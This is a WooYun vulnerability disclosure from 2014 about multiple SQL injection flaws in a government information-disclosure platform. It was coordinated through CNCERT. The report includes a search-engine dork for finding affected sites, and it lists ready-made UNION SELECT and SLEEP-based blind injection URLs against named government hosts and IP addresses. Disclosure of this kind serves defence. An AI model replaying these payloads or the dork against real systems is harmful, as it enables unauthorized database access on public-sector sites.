当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066329

漏洞标题:某ZF信息系统存在多处SQL注入漏洞,涉及大量ZF网站

相关厂商:cncert国家互联网应急中心

漏洞作者: 酱油甲

提交时间:2014-07-15 10:42

修复时间:2014-10-13 10:44

公开时间:2014-10-13 10:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-15: 细节已通知厂商并且等待厂商处理中
2014-07-20: 厂商已经确认,细节仅向厂商公开
2014-07-23: 细节向第三方安全合作伙伴开放
2014-09-13: 细节向核心白帽子及相关领域专家公开
2014-09-23: 细节向普通白帽子公开
2014-10-03: 细节向实习白帽子公开
2014-10-13: 细节向公众公开

简要描述:

某ZF信息系统存在多处SQL注入漏洞,涉及大量ZF网站

详细说明:

中信联信息技术有限公司http://www.uniwin.com.cn/
的 ZF信息公开平台系统(inforopen)
存在多处SQL注入漏洞,影响众多ZF网站
厂商名来源是在这里看到的:
http://221.194.46.67:8080/applyinfo/applyinfoSearch.jsp?disposecode=1'&submit=%b2%e9%d1%af

1.jpg


谷歌一把:
inurl:index.do?templet=list_zbjh_zt ID= deptid=

2.jpg


注入点:
包含deptid的页面
包含id参数的页面:
如:
/getfile.do?id=%7B20010000-FFFF-FFFF-BF71-0E4F00000038%7D&filename=1.txt&type=db
/index.do?templet=list_zbjh_tc&ID=1&deptid=1
/index.do?templet=list_zbjh_zt&ID=1&deptid=1
/index.do?templet=list_zt&ID=1
/index.do?templet=content&id=-1%27+or+1%3d(SELECT+1+FROM+(SELECT+SLEEP(25))A)%2b%27&cid=95%20293(盲注)
等等~~
案例:
1.http://xxgk.yutian.gov.cn/index.do?templet=list_zbjh_zt&ID=64&deptid=-35565 union select 1,2,user(),4,5,6
2.http://221.192.216.130:8080/index.do?templet=list_zbjh_tc&deptid=1&ID=-1%20UNION%20ALL%20SELECT%201,2,CONCAT(0x23,IFNULL(CAST(user()%20AS%20CHAR),0x20),0x23),4,5,6,7,8
3.http://60.10.19.139:8080/index.do?templet=list_zbjh_zt&ID=-1 UNION ALL SELECT 1,2,CONCAT(0x23,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x23),4,5,6,7,8&deptid=1
4.http://xxgk.yutian.gov.cn/index.do?templet=list_zbjh_tc&deptid=1&ID=-1 UNION ALL SELECT 1,2,CONCAT(0x23,IFNULL(CAST(user() AS CHAR),0x20),0x23),4,5,6,7,8
5.http://121.26.200.64:88/index.do?templet=list_zt&ID=64
6.http://221.194.37.24:85/applyinfo/applyinfoSearch.jsp?disposecode=1&submit=%b2%e9%d1%af
7.http://60.10.19.139:8080/index.do?templet=list_zbjh_zt&ID=1&deptid=-35565 union select 1,2,database(),4,5,6
8.http://221.194.46.67:8080/index.do?templet=content&id=-1%27+or+1%3d(SELECT+1+FROM+(SELECT+SLEEP(11))A)%2b%27&cid=95%20293
9.http://60.10.19.139:8080/getfile.do?id=%7B20010000-FFFF-FFFF-BF71-0E4F00000038%7D&filename=1.txt&type=db
还有很多很多……

2.jpg


11.jpg


12.jpg


漏洞证明:

2.jpg


11.jpg


12.jpg

修复方案:

过滤

版权声明:转载请注明来源 酱油甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:19

确认时间:2014-07-20 08:13

厂商回复:

最新状态:

暂无